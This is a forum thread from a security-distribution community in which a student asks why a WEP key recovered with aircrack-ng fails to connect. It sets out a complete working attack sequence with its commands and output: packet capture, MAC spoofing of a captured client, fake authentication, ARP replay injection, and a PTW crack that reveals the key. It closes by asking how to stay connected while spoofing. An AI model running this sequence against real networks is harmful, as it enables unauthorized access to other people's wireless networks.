Results 1 to 1 of 1

Thread: Aircrack returning wrong password ?

Hybrid View

  1. #1
    Just burned their ISO Onikage's Avatar
    Join Date
    Jun 2012
    Posts
    2

    Question Aircrack returning wrong password ?

    [SOLVED: Check the bottom]
    Hello all,
    I'm a first year "Networking & Administration" student. My father has kindly allowed me to try and crack the encryption on the smaller non-significant kitchen WiFi network in his company office. I wasn't told what the password is but we bet that If I was able to crack it my pops would pay my next semester. I realize that similar introductions are not really relevant to the problem, but I just wanted to highlight the fact that I'm not doing anything illegal.

    Straight to the problem. Since the network is WEP-encrypted, I'm running the most common pattern:

    airodump-ng -c 9 --bssid 00:1c:f0:83:c4:f0 -w petrovi_wep -i wlan0
    With this I was able to capture the MAC of someone in the office who was probably using the Net in his Lunch break - cc:55:ad:29:37:98

    Then:
    macchanger-m cc:55:ad:29:37:98 wlan0
    Then:
    bt ~ # aireplay-ng -e "Petrovi" -1 0 -a 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0
    07:51:29 Waiting for beacon frame (BSSID: 00:1C:F0:83:C4:F0) on channel 9

    07:51:29 Sending Authentication Request (Open System) [ACK]
    07:51:29 Authentication successful
    07:51:29 Sending Association Request [ACK]
    07:51:30 Association denied (code 17)

    07:51:33 Sending Authentication Request (Open System)

    07:51:35 Sending Authentication Request (Open System) [ACK]
    07:51:35 Authentication successful
    07:51:35 Sending Association Request [ACK]
    07:51:35 Association successful :-) (AID: 1)
    Then:
    CH 9 ][ Elapsed: 56 s ][ 2012-11-11 07:52

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1C:F0:83:C4:F0 46 82 437 11 0 9 54. WEP WEP OPN Petrovi

    BSSID STATION PWR Rate Lost Packets Probes
    I intentionally highlighted the AUTH parameter since it returns OPN most of the times but every now and then it comes as SKA, which frankly puzzles me. Is it a SKA or an OPN. I don't know. This is not the airodump-screen from the actual cracking operation as you can see #Data is 0, I just pasted it so it can be seen that AUTH does return either an OPN or SKA result once "Association is successful".

    Then:
    aireplay-ng -3 -e "Petrovi" -b 00:1c:f0:83:c4:f0 -h cc:55:ad:29:37:98 wlan0
    And that's about what I do. This way I'm able to capture between 250k and 1.5m IVs. Once I'm done sniffing:
    bt ~ # aircrack-ng petrovi_wep-02.ivs
    Opening petrovi_wep-02.ivs
    Read 219491 packets.

    # BSSID ESSID Encryption

    1 00:1C:F0:83:C4:F0 Petrovi WEP (219490 IVs)

    Choosing first network as target.

    Opening petrovi_wep-02.ivs
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 219490 ivs.
    KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
    Decrypted correctly: 100%
    I also tried live cracking while maintaining airodump-ng with these parameters:
    aircrack-ng -a 1 -0 -n 128 petrovi_wep-02.ivs
    Result again was:
    Opening petrovi_wep-02.ivs
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 219490 ivs.
    KEY FOUND! [ 71:77:65:72:74 ] (ASCII: qwert )
    Decrypted correctly: 100%
    At this point you're probably thinking that there's no problem at all. Well let me tell you this. I've tried connecting with this password a gazillion times using all kinds of options:
    - OPEN wep with 71:77:65:72:74, SKA wep 71:77:65:72:74 Hex
    - OPEN wep with "qwert" with ASCII checked, SKA wep with "qwert" with ASCII checked
    - OPEN wep with "qwert" with ASCII unchecked, SKA wep with "qwert" with ASCII unchecked
    - OPEN wep with 71:77:65:72:74 with ASCII checked, SKA wep with 71:77:65:72:74 with ASCII checked

    None of these worked. PWR is good between 40 and 70. However I can't connect using this password. The funny thing is that the first time when I tried this I captured the MAC of another client and also about 1.5 million IVs. Ran it through PTW - same password, again 100% decrypted correctly. I deleted the first .ivs flie because I thought it was bogus.

    I tried decrypting with "-K" as well, however it ran for 10 straight hours after which I thought to myself that even if it returns a password successfully, waiting for 10 hours is not a viable option for a professional pentester, so the result is useless even if the pass is correct.

    System:
    OS: Backtrack 3 HDD installation (KDE)
    Machine: DELL Latitude CPi D300XT
    Adapter: ALFA awus036h

    I already googled this and I found a couple of guys who claim their aircrack-ng also returns non-functional passwords. However all of them receive a working one in a following run and their problem is fixed. I decrypt the same password over and over again and I can't connect at all.
    I tried connecting with:
    - iwconfig
    - some KDE GUI called K Wireless Lan Manager

    I have no idea what am I doing wrong. Thanks in advance to all the people who decided to join in and help.

    [SOLVED]:
    Ok this was a rather stupid mistake from my side. Apparently the AP was somewhat slower to accept connections. I had to increase timeout to 30s and I was able to connect.

    Question: I was able to connect and opened Google successfully. However AP kicks me 30-60s (sometimes longer) after I connect. I'm using a fake MAC but I still get kicked. Any idea how to resolve this ?
    Last edited by Onikage; 11-11-2012 at 06:40 AM. Reason: [SOLVED]

Similar Threads

  1. Aircrack VS cowpatty WPA dictionary issue. Cowpatty finds password but aircrack not?
    By alm0stadm1n in forum BackTrack 5 Beginners Section
    Replies: 4
    Last Post: 11-20-2011, 12:01 PM
  2. aircrack-ng wrong password
    By TheWood in forum OLD BackTrack 3 Final
    Replies: 4
    Last Post: 01-31-2009, 03:49 PM
  3. Wifi Password - AirCrack-ng
    By dntel in forum OLD Newbie Area
    Replies: 4
    Last Post: 08-01-2008, 04:36 PM
  4. Aircrack-ng and password.lst
    By imported_ASTRAPI in forum OLD Newbie Area
    Replies: 8
    Last Post: 05-02-2007, 08:56 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •